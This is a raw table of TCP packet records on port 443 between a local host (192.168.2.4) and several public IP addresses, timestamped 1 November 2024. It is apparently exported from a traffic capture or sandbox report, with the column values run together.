                                                                                        Nov 1, 2024 13:46:54.462306976 CET49849443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.462311983 CET4434984913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.465058088 CET49856443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.465090990 CET4434985613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.465156078 CET49856443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.465289116 CET49856443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.465301037 CET4434985613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.634973049 CET4434985013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.635446072 CET49850443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.635488987 CET4434985013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.636080027 CET49850443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.636085033 CET4434985013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.682943106 CET4434985113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.683537006 CET49851443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.683557034 CET4434985113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.683980942 CET49851443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.683985949 CET4434985113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.733670950 CET44349855104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.733930111 CET49855443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.733953953 CET44349855104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.735846996 CET44349855104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.735899925 CET49855443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.736675024 CET49855443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.736746073 CET44349855104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.737201929 CET49855443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.737206936 CET44349855104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.757390022 CET44349854104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.757633924 CET49854443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.757683039 CET44349854104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.758719921 CET44349854104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.758779049 CET49854443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.759154081 CET49854443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.759227037 CET44349854104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.766750097 CET4434985213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.766968966 CET4434985013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.767049074 CET4434985013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.767102003 CET49850443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.770798922 CET49852443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.770818949 CET4434985213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.771537066 CET49852443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.771548033 CET4434985213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.771934986 CET49850443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.771954060 CET4434985013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.771964073 CET49850443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.771969080 CET4434985013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.776719093 CET49857443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.776798964 CET4434985713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.776875019 CET49857443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.777153015 CET49857443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.777178049 CET4434985713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.783859015 CET49855443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.794188976 CET4434985313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.794805050 CET49853443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.794837952 CET4434985313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.795289993 CET49853443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.795296907 CET4434985313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.805993080 CET49854443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.806035042 CET44349854104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.814558983 CET4434985113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.814646959 CET4434985113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.814694881 CET49851443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.814847946 CET49851443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.814868927 CET4434985113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.814883947 CET49851443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.814889908 CET4434985113.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.817890882 CET49858443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.817939043 CET4434985813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.818007946 CET49858443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.818217993 CET49858443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.818232059 CET4434985813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.852039099 CET49854443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:54.895971060 CET4434985213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.896140099 CET4434985213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.896198034 CET49852443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.896393061 CET49852443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.896415949 CET4434985213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.896440983 CET49852443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.896449089 CET4434985213.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.899581909 CET49859443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.899625063 CET4434985913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.899693966 CET49859443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.899874926 CET49859443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.899916887 CET4434985913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.924278021 CET4434985313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.924433947 CET4434985313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.924494982 CET49853443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.924910069 CET49853443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.924930096 CET4434985313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.924942017 CET49853443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.924947977 CET4434985313.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.928273916 CET49860443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.928308010 CET4434986013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:54.928378105 CET49860443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.928507090 CET49860443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:54.928527117 CET4434986013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.165906906 CET44349855104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.165941000 CET44349855104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.165967941 CET44349855104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.165982008 CET49855443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:55.165987015 CET44349855104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.166013002 CET44349855104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.166026115 CET49855443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:55.166532040 CET44349855104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.166554928 CET44349855104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.166573048 CET49855443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:55.166578054 CET44349855104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.166614056 CET49855443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:55.166618109 CET44349855104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.166649103 CET44349855104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.166687012 CET49855443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:55.191014051 CET4434985613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.229522943 CET49856443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.229522943 CET49856443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.229549885 CET4434985613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.229561090 CET4434985613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.358948946 CET49855443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:55.358988047 CET44349855104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.365811110 CET49854443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:55.384160042 CET49861443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:55.384190083 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.384345055 CET49861443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:55.385497093 CET49863443192.168.2.4151.101.193.229
                                                                                        Nov 1, 2024 13:46:55.385530949 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.386203051 CET49861443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:55.386215925 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.386276960 CET49863443192.168.2.4151.101.193.229
                                                                                        Nov 1, 2024 13:46:55.386962891 CET49863443192.168.2.4151.101.193.229
                                                                                        Nov 1, 2024 13:46:55.386972904 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.411339045 CET44349854104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.457792044 CET4434985613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.457859993 CET4434985613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.458025932 CET49856443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.463097095 CET49856443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.463097095 CET49856443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.463115931 CET4434985613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.463126898 CET4434985613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.466968060 CET49864443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.467040062 CET4434986413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.467144966 CET49864443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.467453003 CET49864443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.467489004 CET4434986413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.505949020 CET44349854104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.506047964 CET44349854104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.506335974 CET49854443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:55.511363029 CET49854443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:55.511390924 CET44349854104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.513150930 CET4434985713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.515616894 CET49857443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.515638113 CET4434985713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.516877890 CET49857443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.516880035 CET49865443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:55.516884089 CET4434985713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.516912937 CET44349865104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.517059088 CET49865443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:55.520421982 CET49865443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:55.520436049 CET44349865104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.591896057 CET4434985813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.593301058 CET49858443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.593338966 CET4434985813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.595436096 CET49858443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.595443964 CET4434985813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.634531021 CET4434985913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.646914005 CET4434985713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.647089005 CET4434985713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.647365093 CET49857443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.656523943 CET49859443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.656523943 CET49859443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.656564951 CET4434985913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.656586885 CET4434985913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.657027006 CET49857443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.657027006 CET49857443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.657052040 CET4434985713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.657073975 CET4434985713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.662833929 CET49866443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.662885904 CET4434986613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.663007021 CET49866443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.667848110 CET49866443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.667879105 CET4434986613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.692658901 CET4434986013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.717125893 CET49860443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.717145920 CET4434986013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.718236923 CET49860443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.718245029 CET4434986013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.728049040 CET4434985813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.728254080 CET4434985813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.728426933 CET49858443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.733982086 CET49858443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.734014988 CET4434985813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.734061003 CET49858443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.734070063 CET4434985813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.776968956 CET49867443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.777004004 CET4434986713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.777390957 CET49867443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.777740955 CET49867443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.777754068 CET4434986713.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.782567978 CET4434985913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.782835960 CET4434985913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.783006907 CET49859443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.787904978 CET49859443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.787904978 CET49859443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.787931919 CET4434985913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.787961006 CET4434985913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.810775995 CET49868443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.810823917 CET4434986813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.810971022 CET49868443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.811430931 CET49868443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.811441898 CET4434986813.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.844567060 CET4434986013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.844804049 CET4434986013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.847524881 CET49860443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.848125935 CET49860443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.848145962 CET4434986013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.848159075 CET49860443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.848167896 CET4434986013.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.856437922 CET49869443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.856476068 CET4434986913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.856683969 CET49869443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.860591888 CET49869443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:55.860605001 CET4434986913.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:55.991919994 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.002213001 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.034027100 CET49863443192.168.2.4151.101.193.229
                                                                                        Nov 1, 2024 13:46:56.034058094 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.035146952 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.035239935 CET49863443192.168.2.4151.101.193.229
                                                                                        Nov 1, 2024 13:46:56.036863089 CET49861443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:56.036887884 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.036892891 CET49863443192.168.2.4151.101.193.229
                                                                                        Nov 1, 2024 13:46:56.036958933 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.037981987 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.038032055 CET49863443192.168.2.4151.101.193.229
                                                                                        Nov 1, 2024 13:46:56.038039923 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.038073063 CET49861443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:56.038458109 CET49861443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:56.038516045 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.039437056 CET49861443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:56.039444923 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.085977077 CET49861443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:56.085980892 CET49863443192.168.2.4151.101.193.229
                                                                                        Nov 1, 2024 13:46:56.125225067 CET44349865104.21.8.81192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.163981915 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.164066076 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.164096117 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.164130926 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.164150953 CET49863443192.168.2.4151.101.193.229
                                                                                        Nov 1, 2024 13:46:56.164158106 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.164167881 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.164186001 CET49863443192.168.2.4151.101.193.229
                                                                                        Nov 1, 2024 13:46:56.164232016 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.164261103 CET49863443192.168.2.4151.101.193.229
                                                                                        Nov 1, 2024 13:46:56.164274931 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.164810896 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.164926052 CET49863443192.168.2.4151.101.193.229
                                                                                        Nov 1, 2024 13:46:56.164933920 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.168426037 CET49863443192.168.2.4151.101.193.229
                                                                                        Nov 1, 2024 13:46:56.180430889 CET49865443192.168.2.4104.21.8.81
                                                                                        Nov 1, 2024 13:46:56.182290077 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.182334900 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.182360888 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.182485104 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.182513952 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.182518959 CET49861443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:56.182528973 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.182580948 CET49861443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:56.182580948 CET49861443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:56.182590961 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.182883978 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.183006048 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.186454058 CET49861443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:56.186460972 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.195436001 CET49861443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:56.198334932 CET4434986413.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.256443024 CET49864443192.168.2.413.107.246.45
                                                                                        Nov 1, 2024 13:46:56.281094074 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.281141043 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.283251047 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.283257961 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.283269882 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.283451080 CET49863443192.168.2.4151.101.193.229
                                                                                        Nov 1, 2024 13:46:56.283471107 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.286457062 CET49863443192.168.2.4151.101.193.229
                                                                                        Nov 1, 2024 13:46:56.302459955 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.302659988 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.302687883 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.302788973 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.302818060 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.302819014 CET49861443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:56.302829981 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.302881002 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.302889109 CET49861443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:56.302889109 CET49861443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:56.302897930 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.303422928 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.303462029 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.303479910 CET49861443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:56.303488016 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.303518057 CET49861443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:56.304481030 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.304523945 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.304553032 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.305125952 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.305155039 CET49861443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:56.305160046 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.305171013 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.305243015 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.305267096 CET49861443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:56.305275917 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.305305004 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.305330992 CET49861443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:56.305339098 CET44349861104.17.24.14192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.307431936 CET49861443192.168.2.4104.17.24.14
                                                                                        Nov 1, 2024 13:46:56.399780989 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.399791002 CET4434986613.107.246.45192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.399812937 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.399946928 CET49863443192.168.2.4151.101.193.229
                                                                                        Nov 1, 2024 13:46:56.399980068 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.400024891 CET49863443192.168.2.4151.101.193.229
                                                                                        Nov 1, 2024 13:46:56.401070118 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.401096106 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.401170969 CET49863443192.168.2.4151.101.193.229
                                                                                        Nov 1, 2024 13:46:56.401185036 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.401225090 CET49863443192.168.2.4151.101.193.229
                                                                                        Nov 1, 2024 13:46:56.403048038 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.403070927 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.403136969 CET49863443192.168.2.4151.101.193.229
                                                                                        Nov 1, 2024 13:46:56.403150082 CET44349863151.101.193.229192.168.2.4
                                                                                        Nov 1, 2024 13:46:56.403186083 CET49863443192.168.2.4151.101.193.229
